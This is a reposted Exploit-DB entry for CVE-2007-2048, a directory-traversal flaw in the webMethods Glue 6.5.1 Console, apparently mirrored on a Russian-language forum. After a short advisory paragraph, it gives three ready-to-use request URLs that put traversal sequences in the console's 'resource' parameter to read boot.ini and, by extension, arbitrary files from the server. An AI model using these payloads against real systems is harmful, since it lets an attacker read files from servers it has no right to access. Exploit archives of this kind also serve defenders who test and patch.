- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 29843
- Проверка EDB
-
- Пройдено
- Автор
- PATRICK WEBSTER
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2007-2048
- Дата публикации
- 2007-04-11
webMethods Glue 6.5.1 Console - Directory Traversal
Код:
source: https://www.securityfocus.com/bid/23423/info
webMethods Glue is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable computer with the privileges of the affected application. Information obtained may aid in further attacks.
This issue affects webMethods Glue 6.5.1; other versions may also be vulnerable.
http://www.example.com:8080/console?resource=../../../boot.ini
http://www.example.com:8080/console?resource=\boot.ini
http://www.example.com:8080/console?resource=c:\boot.ini- Источник
- www.exploit-db.com
